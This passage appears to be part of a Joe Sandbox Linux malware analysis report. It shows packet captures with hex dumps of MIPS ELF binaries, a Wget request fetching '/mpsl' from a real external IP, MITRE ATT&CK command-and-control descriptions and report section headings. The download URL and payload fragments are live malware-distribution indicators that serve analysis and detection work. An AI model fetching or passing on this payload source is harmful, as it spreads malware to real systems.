Apr 25, 2024 19:36:19.952339888 CEST	1289	IN	Data Raw: 00 04 92 04 00 00 8f bc 00 10 00 04 18 80 8f 99 84 48 00 62 18 21 24 84 00 01 ac 71 00 00 ae 42 00 00 a2 04 00 00 24 05 00 08 03 20 f8 09 24 04 00 01 8f bc 00 10 92 05 00 00 8f 83 83 c0 8f 99 83 90 00 40 88 21 8e 44 00 00 24 02 00 05 00 05 28 80 Data Ascii: Hb!$qB$ $@!D$(#" $Hb!$qB$ $@!D$(#" $Hb!$qB$ $
Apr 25, 2024 19:36:19.952380896 CEST	1289	IN	Data Raw: 54 8f bc 00 18 02 00 28 21 8f 99 82 a8 02 20 20 21 24 06 00 04 24 07 00 40 03 20 f8 09 00 40 b0 21 8f bc 00 18 30 42 00 ff 8f 99 82 a8 02 00 28 21 02 20 20 21 24 06 00 05 24 07 00 01 03 20 f8 09 af a2 00 50 8f bc 00 18 00 02 16 00 8f 99 82 a8 00 Data Ascii: T(! !$$@ @!0B(! !$$ P(!$4 ! L(! !$4 @!(! !0!$ @!(! !$$ @(! !$8!
Apr 25, 2024 19:36:19.952419043 CEST	1289	IN	Data Raw: 03 20 f8 09 24 06 00 02 8f a3 00 3c 8f bc 00 18 14 60 00 73 00 00 00 00 8f 99 82 ec 02 20 20 21 24 05 00 14 03 20 f8 09 a6 20 00 0a 8f bc 00 18 02 40 20 21 8f 99 82 ec a6 22 00 0a 24 05 00 14 03 20 f8 09 a6 40 00 0a 8f bc 00 18 a6 42 00 0a 8f 99 Data Ascii: $<`s !$ @ !"$ @Bl@ !(! !@ #% !$$p$@ (! ! $d*@ z{ h
Apr 25, 2024 19:36:19.952455997 CEST	1289	IN	Data Raw: 83 20 21 8f a3 00 20 8f bc 00 18 ac 82 00 00 8f a4 00 50 00 03 18 80 00 64 18 21 8c 70 00 00 3c 03 0f ff 8e 02 00 00 34 63 ff ff 00 43 10 24 3c 04 40 00 3c 03 f0 ff 00 44 10 25 34 63 ff ff 00 43 10 24 3c 04 05 00 00 44 10 25 ae 02 00 00 8f a2 00 Data Ascii: ! Pd!p<4cC$<@<D%4cC$<D%DhH(@&&,@&$@$/$d !@ #<4cC$L !<@C%<4D$<D%
Apr 25, 2024 19:36:19.952496052 CEST	1289	IN	Data Raw: 00 10 30 42 ff ff 8f 99 82 a8 02 20 20 21 02 00 28 21 24 06 00 06 34 07 ff ff 03 20 f8 09 af a2 00 30 8f bc 00 10 30 42 ff ff 8f 99 82 a8 02 20 20 21 02 00 28 21 00 00 30 21 24 07 02 00 03 20 f8 09 af a2 00 2c 8f bc 00 10 02 20 20 21 8f 99 82 a8 Data Ascii: 0B !(!$4 00B !(!0!$ , !(!$$ 0S,4 $!bp!@Hd( $(&R<&1H4 $04h
Apr 25, 2024 19:36:19.952533960 CEST	1289	IN	Data Raw: a8 02 20 20 21 24 06 00 01 24 07 00 01 03 20 f8 09 00 40 b0 21 8f bc 00 18 00 02 16 00 8f 99 84 d0 00 02 16 03 24 04 00 02 24 05 00 03 24 06 00 06 03 20 f8 09 af a2 01 48 24 10 ff ff 00 15 ae 03 00 14 a6 03 00 12 96 03 8f bc 00 18 10 50 01 12 00 Data Ascii: !$$ @!$$$ H$P@!$$ !(!$ ' Pl 0B`d2BTPL0c00Bt'(2x\|2'8'H'$
Apr 25, 2024 19:36:19.952574968 CEST	1289	IN	Data Raw: 8f a4 01 58 00 62 10 06 02 02 80 21 34 02 ff ff 14 82 ff 32 af b0 00 2c 8f 99 83 68 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 18 10 00 ff 2c a7 a2 00 2a 8f b0 00 20 8f a3 01 70 00 10 11 00 00 62 10 21 ac 46 00 00 8e 43 00 04 96 45 00 02 ac 43 Data Ascii: Xb!42,h ,* pb!FCECDDG ! E !~!p<4D$<@C%<4cC$<C%h`d\&$@
Apr 25, 2024 19:36:20.178863049 CEST	1289	IN	Data Raw: bc 00 18 10 50 01 46 00 00 00 00 8f a2 00 64 8f a3 00 60 30 42 ff ff af a2 00 40 8f a2 00 5c 30 63 ff ff 30 42 ff ff af a3 00 38 af a2 00 34 1a 60 01 4c af a0 00 20 8f a3 00 50 8f a2 00 4c 30 64 00 01 00 14 a6 00 8f a3 00 48 30 45 00 01 00 14 a6 Data Ascii: PFd`0B@\0c0B84`L PL0dH0E022H0f2$V(%@-L4<@Dlptx\|2!H$ $h ! hb!p<4cC$<@C%

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.20	58178	94.156.79.129	80

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 19:36:21.253206015 CEST	156	OUT	GET /mpsl HTTP/1.1 User-Agent: Wget/1.17.1 (linux-gnu) Accept: / Accept-Encoding: identity Host: 94.156.79.129 Connection: Keep-Alive
Apr 25, 2024 19:36:21.485692978 CEST	711	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 99900 Content-Type: application/octet-stream Last-Modified: Sat, 20 Apr 2024 04:31:20 GMT Date: Thu, 25 Apr 2024 17:36:21 GMT Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 08 00 01 00 00 00 60 02 40 00 34 00 00 00 0c 84 01 00 07 10 00 00 34 00 20 00 03 00 28 00 0e 00 0d 00 01 00 00 00 00 00 00 00 00 00 40 00 00 00 40 00 b0 79 01 00 b0 79 01 00 05 00 00 00 00 00 01 00 01 00 00 00 b4 79 01 00 b4 79 45 00 b4 79 45 00 f4 09 00 00 9c f1 00 00 06 00 00 00 00 00 01 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 06 00 1c 3c 2c fd 9c 27 21 e0 99 03 e0 ff bd 27 10 00 bc af 1c 00 bf af 18 00 bc af 01 00 11 04 00 00 00 00 06 00 1c 3c 08 fd 9c 27 21 e0 9f 03 24 80 99 8f 00 00 00 00 dc 01 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 01 00 11 04 00 00 00 00 06 00 1c 3c d8 fc 9c 27 21 e0 9f 03 20 80 99 8f 00 00 00 00 80 50 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 1c 00 bf 8f 00 00 00 00 08 00 e0 03 20 00 bd 27 06 00 1c 3c a0 fc 9c 27 21 e0 99 03 d8 ff bd 27 20 00 bf af 1c 00 b1 af 18 00 b0 af 10 00 bc af 18 80 91 8f 00 00 00 00 e0 83 22 92 00 00 00 00 1d 00 40 14 00 00 00 00 1c 80 90 8f 00 00 00 00 d0 79 02 8e 00 00 00 00 00 00 59 8c 00 00 00 00 09 00 20 13 04 00 42 24 09 f8 20 03 d0 79 02 ae d0 79 02 8e 10 00 bc 8f 00 00 59 8c 00 00 00 00 f9 ff 20 17 04 00 42 24 04 84 82 8f 00 00 00 00 08 00 40 10 01 00 02 24 20 80 84 8f 04 84 99 8f 00 00 00 00 09 f8 20 03 b0 79 84 24 10 00 bc 8f 01 00 02 24 e0 83 22 a2 20 00 bf 8f 1c 00 b1 8f 18 00 b0 8f 08 00 e0 03 28 00 bd 27 06 00 1c 3c e4 fb 9c 27 21 e0 99 03 e0 ff bd 27 18 00 bf af 10 00 bc af 20 80 84 8f 18 80 85 8f a0 81 82 8f Data Ascii: ELF`@44 (@@yyyyEyEQtd<,'!'<'!$9' <'! P9' '<'!' "@yY B$ yyY B$@$ y$$" ('<'!'
Apr 25, 2024 19:36:21.485764980 CEST	1289	IN	Data Raw: a0 81 99 8f b0 79 84 24 05 00 40 10 e4 83 a5 24 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 1c 80 84 8f ac 81 99 8f c4 79 82 8c 00 00 00 00 06 00 40 10 c4 79 84 24 04 00 20 13 00 00 00 00 18 00 bf 8f 08 00 20 03 20 00 bd 27 18 00 bf 8f 00 00 Data Ascii: y$@$ y@y$ ' '!<T'!! '$$'tH <'!'0,($
Apr 25, 2024 19:36:21.485795975 CEST	1289	IN	Data Raw: 28 40 00 21 10 13 02 06 00 44 24 02 00 06 24 04 00 42 92 00 00 43 8e 05 00 52 26 14 00 a2 a0 04 00 a3 ac 10 00 a3 ac 00 00 a6 a4 f8 ff 92 14 18 00 a5 24 21 10 d7 02 23 10 22 02 fa ff 54 24 2b 00 80 16 00 00 00 00 24 00 a0 af 20 00 a4 8f 00 00 00 Data Ascii: (@!D$$BCR&$!#"T$+$ $@!@!1&&@! @ $TPLHD@<840 X'B
Apr 25, 2024 19:36:21.485930920 CEST	1289	IN	Data Raw: 99 8f 21 88 40 00 00 00 44 8e 04 00 02 24 80 28 05 00 00 00 23 ae 04 00 22 a2 09 f8 20 03 04 00 a5 24 00 00 04 92 10 00 bc 8f 80 18 04 00 48 84 99 8f 21 18 62 00 01 00 84 24 00 00 71 ac 00 00 42 ae 00 00 04 a2 08 00 05 24 09 f8 20 03 01 00 04 24 Data Ascii: !@D$(#" $H!b$qB$ $!@D$(#" $H!b$qB$ $!@D$(#" $H!
Apr 25, 2024 19:36:21.485980988 CEST	1289	IN	Data Raw: 8f ff 00 42 30 a8 82 99 8f 21 28 00 02 03 00 06 24 ff ff 07 34 21 20 20 02 09 f8 20 03 58 00 a2 af 18 00 bc 8f 21 28 00 02 a8 82 99 8f 21 20 20 02 04 00 06 24 40 00 07 24 09 f8 20 03 21 b0 40 00 18 00 bc 8f ff 00 42 30 a8 82 99 8f 21 28 00 02 21 Data Ascii: B0!($4! X!(! $@$ !@B0!(! $$ T!($4! P!(! $4 !@!(! !0$ !@!(! $$ L
Apr 25, 2024 19:36:21.486047983 CEST	1289	IN	Data Raw: 18 00 bc 8f 00 00 00 00 68 83 99 8f 00 00 00 00 09 f8 20 03 28 00 a2 af 18 00 bc 8f 6c 00 a5 8f 40 83 99 8f 2c 00 a2 af 21 20 60 02 09 f8 20 03 04 00 06 24 18 00 bc 8f 70 00 a5 8f 40 83 99 8f 06 00 64 26 09 f8 20 03 04 00 06 24 18 00 bc 8f 74 00 Data Ascii: h (l@,! ` $p@d& $t@d& $x@d& $H@! $ ! @"$ @B\|! @!( @!#
Apr 25, 2024 19:36:21.486067057 CEST	1289	IN	Data Raw: f8 20 03 20 00 a7 27 18 00 bc 8f 99 00 50 10 00 96 12 00 03 96 12 00 ff ff d7 32 40 00 b2 af ff ff b6 32 20 00 a0 af 5f 01 80 1a ff ff 75 32 48 00 a3 8f 27 28 17 00 ff ff 62 30 08 00 43 24 34 00 44 24 1c 00 42 24 ff ff 84 30 ff ff 42 30 ff ff a5 Data Ascii: 'P2@2 _u2H'(b0C$4D$B$0B00c00J00l0222J2RZ:Bb"j*rz% %h%J%(%8%@%l!<840,("
Apr 25, 2024 19:36:21.486103058 CEST	1289	IN	Data Raw: 99 8f 00 00 00 00 09 f8 20 03 00 00 00 00 ff ff 42 30 18 fc 43 24 27 18 03 00 18 00 bc 8f 04 00 22 a6 87 ff d0 16 04 00 43 a6 68 83 99 8f 00 00 00 00 09 f8 20 03 00 00 00 00 18 00 bc 8f 82 ff b0 16 2c 00 22 a6 68 83 99 8f 00 00 00 00 09 f8 20 03 Data Ascii: B0C$'"Ch ,"h @~bh BD{@H d&tHH$4B$`DdE <'!'\XTPLH
Apr 25, 2024 19:36:21.486120939 CEST	1289	IN	Data Raw: 24 21 80 e0 00 09 f8 20 03 ff 00 d1 30 18 00 bc 8f 21 20 60 02 48 84 99 8f 04 00 05 24 09 f8 20 03 6c 01 a2 af 18 00 bc 8f 21 28 00 02 a8 82 99 8f 21 20 20 02 02 00 06 24 21 38 00 00 09 f8 20 03 68 01 a2 af 18 00 bc 8f ff 00 42 30 a8 82 99 8f 21 Data Ascii: $! 0! `H$ l!(! $!8 hB0!($4! d!(! $@$ !@B0!(! $$ `!(! $4 \B0!(! $!8
Apr 25, 2024 19:36:21.486157894 CEST	1289	IN	Data Raw: 2a 18 53 00 7a ff 60 14 20 00 a2 af 28 00 d5 26 14 00 d2 26 ff ff 60 1a 00 00 00 00 ff ff 43 32 ff 00 62 30 00 12 02 00 02 1a 03 00 25 a0 43 00 20 00 a0 af 21 18 00 00 68 01 a4 8f 80 10 03 00 21 10 44 00 00 00 50 8c ff ff 02 34 68 83 99 8f 44 00 Data Ascii: *Sz` (&&`C2b0%C !h!DP4hD&H(&H!(! $ l)!(ed00"% c$$b0%b#! !( !0!8@
Apr 25, 2024 19:36:21.718089104 CEST	1289	IN	Data Raw: 00 b5 af 98 00 b4 af 94 00 b3 af 90 00 b2 af 8c 00 b1 af 88 00 b0 af 18 00 bc af 48 84 99 8f ff 00 93 30 b4 00 a5 af 21 20 60 02 04 00 05 24 ff 00 d0 30 09 f8 20 03 21 88 e0 00 18 00 bc 8f 21 20 00 02 a8 82 99 8f 21 28 20 02 02 00 06 24 21 38 00 Data Ascii: H0! `$0 !! !( $!8 lB0! $4!( P! !( $@$ !@B0! !( $!8 L! $4!( H!

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report

Overview

General Information

Detection

Signatures

Classification

General Information

Errors

Warnings

Yara Signatures

Snort Signatures

Joe Sandbox Signatures

Networking

System Summary

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

System Behavior